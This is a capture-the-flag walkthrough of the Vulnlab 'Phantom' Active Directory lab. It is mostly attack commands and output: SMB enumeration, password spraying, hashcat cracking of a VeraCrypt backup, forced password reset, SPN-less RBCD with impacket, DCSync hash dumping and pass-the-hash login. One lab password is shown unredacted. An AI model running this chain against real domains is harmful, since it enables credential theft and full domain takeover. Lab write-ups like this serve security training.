Phantom — Vulnlab Full Walkthrough (TjNull list)
This writeup covers a comprehensive, multi-step penetration testing assessment targeting a complex enterprise network. The attack path demonstrates how minor initial oversights—such as unauthenticated network shares and weak password policies—can chain together to allow a complete takeover of an Active Directory domain. The compromise lifecycle moves from basic SMB enumeration and password spraying to offline cryptographic cracking and advanced Resource-Based Constrained Delegation (RBCD) exploitation.
Welcome Reader, Today we’ll hack Phantom from Vulnlab. Windows — Medium (ar0x4).
Enumeration
Let’s start with a full port nmap scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
Nmap scan report for 10.10.74.183 (10.10.74.183)
Host is up, received user-set (0.18s latency).
Scanned at 2024-10-10 09:21:38 PKT for 619s
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-10 04:29:53Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PHANTOM
| NetBIOS_Domain_Name: PHANTOM
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: phantom.vl
| DNS_Computer_Name: DC.phantom.vl
| DNS_Tree_Name: phantom.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-10T04:31:13+00:00
| ssl-cert: Subject: commonName=DC.phantom.vl
| Issuer: commonName=DC.phantom.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-05T19:49:21
| Not valid after: 2025-01-04T19:49:21
| MD5: 20b2:6e9b:d25b:051a:c734:2ea8:1929:cebe
| SHA-1: 8a5d:0167:e13a:84de:8d99:d55e:71ca:4967:d5ed:59b8
| -----BEGIN CERTIFICATE-----
| MIIC3jCCAcagAwIBAgIQYf5wIHhjqJ5IA4lUSwlUIzANBgkqhkiG9w0BAQsFADAY
| MRYwFAYDVQQDEw1EQy5waGFudG9tLnZsMB4XDTI0MDcwNTE5NDkyMVoXDTI1MDEw
| NDE5NDkyMVowGDEWMBQGA1UEAxMNREMucGhhbnRvbS52bDCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBAMA8vPTkukVbvxXxp/V+N7cx+cequ2q7oT0am6tO
| UHH37XVXO6x2Ndt8hK9ty4gBr1BFbjCGX21TIa1C7IEe95IvpCMIbxUdaqMGss4Y
| EnFiJJiH6HdjEaHmms5ENzQdPldz3cBfIfagK1pTUUVynFzheRIIk/Y5D5X4GSxr
| Utr7wTIZn0rc/3yZSdVi3fCcDKBACwIInYr0S/N9fFb03OO7wi2+vs/Qiq49yxar
| TD/GR5SMOdR+ZK+Pw+fFPn04NCGIL6WrQFczR3Z3/w+paD+k7LFuoiLcB59w9+et
| NFf0kV/zYX2AJv9PCznmHtfwjWBk6aitJ5CHysvjst1Gpx0CAwEAAaMkMCIwEwYD
| VR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IB
| AQBYK45hNioFPjz9IpeVs5rybWi9AcDIUJamsU+csyv5o/goVRmf3j7lR7fG2coT
| WIYHRJhaz0/TLzbxWi9ux5lHmvXfr3aiBQKTo3K2HE0PCnUJ+yCftN19tm2vMvi8
| sMKuXuAShgyrbvg49njeTbBHi5q1nNZlS8m6ZxBnZ1eEFZoqVMqTMtd5T4XyyaOC
| OeDWvrXiZcMIJdZGAofTYDQjgrkG1yKxIZ32cZpp8OtDncRxfv+PEoH08B0oeRtk
| GCc7C4WEkMsjNMcfjNmMO0tRlhOU19YlRANffaM0gtDfRTqV7xos8XIqX+3JuZWf
| gkuzd+cf8gfrRullHsu18Ik/
|_-----END CERTIFICATE-----
|_ssl-date: 2024-10-10T04:31:51+00:00; -1s from scanner time.
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49834/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
SMB — 445
Listing SMB shares with anonymous access.
1
2
3
4
5
6
7
8
9
10
11
12
13
/home/daffy 10.8.3.192 # crackmapexec smb 10.10.74.183 -u guest -p '' --shares
SMB 10.10.74.183 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB 10.10.74.183 445 DC [+] phantom.vl\guest:
SMB 10.10.74.183 445 DC [+] Enumerated shares
SMB 10.10.74.183 445 DC Share Permissions Remark
SMB 10.10.74.183 445 DC ----- ----------- ------
SMB 10.10.74.183 445 DC ADMIN$ Remote Admin
SMB 10.10.74.183 445 DC C$ Default share
SMB 10.10.74.183 445 DC Departments Share
SMB 10.10.74.183 445 DC IPC$ READ Remote IPC
SMB 10.10.74.183 445 DC NETLOGON Logon server share
SMB 10.10.74.183 445 DC Public READ
SMB 10.10.74.183 445 DC SYSVOL Logon server share
We have read access to Public and IPC$. Public share looks more interesting let’s take a look at Public share.
1
2
3
4
5
6
7
8
9
10
/home/daffy 10.8.3.192 # impacket-smbclient phantom.vl/guest@phantom.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use Public
# ls
drw-rw-rw- 0 Thu Jul 11 20:03:14 2024 .
drw-rw-rw- 0 Sun Jul 7 13:39:30 2024 ..
-rw-rw-rw- 14565 Sat Jul 6 21:09:28 2024 tech_support_email.eml
# get tech_support_email.eml
I found a tech_support_email.eml file and downloaded it to my attacking machine. Looking at the file it’s an email from Lucas asking to use a new template he made.
He also attached the template as base64 let’s decode it. I saved the base64 text and converted it back to PDF.
1
cat file-base64 | base64 -d > welcome_template.pdf
There is a password in the template as well. I used rid-brute to fetch users from the domain and stored them in a file.
1
crackmapexec smb 10.10.74.183 -u guest -p '' --rid-brute
Now we can spray that password against all the users using crackmapexec.
1
2
3
4
5
6
7
8
9
10
/home/daffy/Documents/Raw 10.8.3.192 # crackmapexec smb 10.10.74.183 -u users -p '<REDACTED>' --continue-on-success
SMB 10.10.74.183 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
< ... SNIP ... >
SMB 10.10.74.183 445 DC [-] phantom.vl\ppayne:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [+] phantom.vl\ibryant:<REDACTED> <-- Password Found
SMB 10.10.74.183 445 DC [-] phantom.vl\ssteward:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [-] phantom.vl\wstewart:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [-] phantom.vl\vhoward:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [-] phantom.vl\crose:<REDACTED> STATUS_LOGON_FAILURE
< ... SNIP ... >
VeraCrypt
Listing SMB shares again with new user ibryant.
1
2
3
4
5
6
7
8
9
10
11
12
13
/home/daffy/Documents/Raw 10.8.3.192 # crackmapexec smb 10.10.74.183 -u ibryant -p '<REDACTED>' --shares
SMB 10.10.74.183 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB 10.10.74.183 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB 10.10.74.183 445 DC [+] Enumerated shares
SMB 10.10.74.183 445 DC Share Permissions Remark
SMB 10.10.74.183 445 DC ----- ----------- ------
SMB 10.10.74.183 445 DC ADMIN$ Remote Admin
SMB 10.10.74.183 445 DC C$ Default share
SMB 10.10.74.183 445 DC Departments Share READ
SMB 10.10.74.183 445 DC IPC$ READ Remote IPC
SMB 10.10.74.183 445 DC NETLOGON READ Logon server share
SMB 10.10.74.183 445 DC Public READ
SMB 10.10.74.183 445 DC SYSVOL READ Logon server share
While enumerating Departments Share I found a VeraCrypt file under Departments Share/IT/Backup/IT_BACKUP_201123.hc. There is a VeraCrypt deb file that we can use to install it on out attacking machine and mount the VeraCrypt file. We can download a different version as well as per our system requirements.
VeraCrypt is a free, open-source disk encryption tool that helps protect data from unauthorized access. read more
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/home/daffy/Downloads 10.8.3.192 # impacket-smbclient phantom.vl/ibryant:'<REDACTED>'@phantom.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Departments Share
# ls
drw-rw-rw- 0 Sat Jul 6 21:25:31 2024 .
drw-rw-rw- 0 Sun Jul 7 13:39:30 2024 ..
drw-rw-rw- 0 Sat Jul 6 21:25:11 2024 Finance
drw-rw-rw- 0 Sat Jul 6 21:21:31 2024 HR
drw-rw-rw- 0 Thu Jul 11 19:59:02 2024 IT
# cd IT/Backup
# ls
drw-rw-rw- 0 Sat Jul 6 23:04:34 2024 .
drw-rw-rw- 0 Thu Jul 11 19:59:02 2024 ..
-rw-rw-rw- 12582912 Sat Jul 6 23:04:34 2024 IT_BACKUP_201123.hc
The file is password protected time to do some cracking ;) Now if we use the rockyou password list it’ll take very long so I did some thinking and used some combinations like year and special characters with company name. Let’s create a password list.
1
2
3
4
phantom
Phantom
Ph4ntom
Ph4nt0m
A rule as well to add the year and special characters.
1
2
3
4
5
6
7
8
9
10
11
12
13
$2 $0 $2 $3 $!
$2 $0 $2 $3 $@
$2 $0 $2 $3 $#
$2 $0 $2 $3 $$
$2 $0 $2 $3 $%
$2 $0 $2 $3 $^
$2 $0 $2 $3 $&
$2 $0 $2 $3 $*
$2 $0 $2 $3 $(
$2 $0 $2 $3 $)
$2 $0 $2 $3 $-
$2 $0 $2 $3 $=
$2 $0 $2 $3 $+
Let’s give it a go.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
~ $ hashcat -m 13721 IT_BACKUP_201123.hc passwords -r phantom.rule
...SNIP...
IT_BACKUP_201123.hc:<REDACTED>
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13721 (VeraCrypt SHA512 + XTS 512 bit (legacy))
Hash.Target......: IT_BACKUP_201123.hc
Time.Started.....: Thu Oct 10 11:15:40 2024 (6 secs)
Time.Estimated...: Thu Oct 10 11:15:46 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwords)
Guess.Mod........: Rules (phantom.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1 H/s (0.28ms) @ Accel:256 Loops:62 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4/52 (7.69%)
Rejected.........: 0/4 (0.00%)
Restore.Point....: 0/4 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:499968-499999
Candidate.Engine.: Device Generator
Candidates.#1....: phantom2023! -> Ph4nt0m2023!
Hardware.Mon.#1..: Temp: 48c Util: 78% Core:1830MHz Mem:6000MHz Bus:8
Started: Thu Oct 10 11:15:33 2024
Stopped: Thu Oct 10 11:15:47 2024
We successfully cracked the password. Let’s mount the file and see what’s hidden in there.
Initial Foothold
I copied the vyos_backup.tar.gz to my local storage and unziped it and found a password of user lstanley under /config/config.boot
1
2
3
4
5
6
authentication {
local-users {
username lstanley {
password "<REDACTED>"
}
}
I couldn’t login anywhere with user so I brute forced the password once again using crackmapexec.
1
2
~ $ crackmapexec smb phantom.vl -u users -p '<REDACTED>' --continue-on-success
SMB phantom.vl 445 DC [+] phantom.vl\svc_sspr:<REDACTED>
Now we can login with winrm I used bloodhound-python to enumerate the Active Directory. We got our user flag as well.
1
2
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> more user.txt
VL{<FLAGGED>}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/home/daffy/Documents/Raw 10.8.3.192 # bloodhound-python -u "ibryant" -p '<REDACTED>' -d phantom.vl -c all --zip -ns 10.10.74.183
INFO: Found AD domain: phantom.vl
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.phantom.vl:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Found 30 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.phantom.vl
INFO: Done in 00M 42S
INFO: Compressing output into 20241010114830_bloodhound.zip
Privilege Escalation
The user svc_sspr can ForceChangePassword of wsilva and two other user and all of them are member of ict security group.
ict security group has AddAllowedToAct Object Control over dc.phantom.vl which we can abuse to obtain administrator privileges by performing a Resource-based constrained attack.
ForceChangePassword
We will use net binary for this one. Net is a tool for administration of Samba and remote CIFS servers.
1
~ $ net rpc password "WSILVA" 'Admin123!' -U phantom.vl/svc_sspr%<REDACTED> -S phantom.vl
No error means the command ran successfully.
Resource-based constrained (RBCD) SPN-LESS
This article here explains this attack very well. First, we have to do the normal RBCD, and instead of a passing a machine account in the -delegate-from option, we will pass the user wsilva.
1
2
3
4
5
6
7
8
9
~ $ impacket-rbcd -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.74.183' -action 'write' 'phantom.vl'/'wsilva':'Admin123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] wsilva (S-1-5-21-4029599044-1972224926-2225194048-1114)
[*] wsilva can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] wsilva (S-1-5-21-4029599044-1972224926-2225194048-1114)
Then we need to obtain a TGT through overpass-the-hash to use RC4.
1
2
3
4
5
~ $ impacket-getTGT -hashes :$(pypykatz crypto nt 'Admin123!') 'phantom.vl'/'wsilva'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in wsilva.ccache
~ $ export KRB5CCNAME=wsilva.ccache
Now the TGT session key.
1
2
~ $ impacket-describeTicket 'wsilva.ccache' | grep 'Ticket Session Key'
[*] Ticket Session Key : 0b13e9062cd35e8b5c8a01d0b33e379f
Now we will Change the controlledaccountwithoutSPN's NT hash with the TGT session key.
1
2
3
4
5
6
~ $ impacket-changepasswd -newhashes :0b13e9062cd35e8b5c8a01d0b33e379f 'phantom.vl'/'wsilva':'Admin123!'@'phantom.vl'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of phantom.vl\wsilva
[*] Connecting to DCE/RPC as phantom.vl\wsilva
[*] Password was changed successfully.
[!] User will need to change their password on next logging because we are using hashes.
Obtaining the delegated service ticket through S4U2self+U2U, followed by S4U2proxy.
1
2
3
4
5
6
7
~ $ impacket-getST -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
~ $ export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
Now can can use that to perform DCSync attack and dump all the hashes including administrator NT hash.
1
2
3
4
5
~ $ crackmapexec smb dc.phantom.vl --use-kcache --ntds
SMB phantom.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB phantom.vl 445 DC [+] phantom.vl\ from ccache (Pwn3d!)
SMB phantom.vl 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB phantom.vl 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Logging in using winrm and fetching the root flag.
1
2
3
4
5
6
7
8
9
10
11
~ $ evil-winrm -i phantom.vl -u Administrator -H <REDACTED>
Evil-WinRM shell v3.6
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ..\Desktop\root.txt
VL{<REDACTED>}
We successfully hacked Phantom form Vulnlab. Thanks for reading.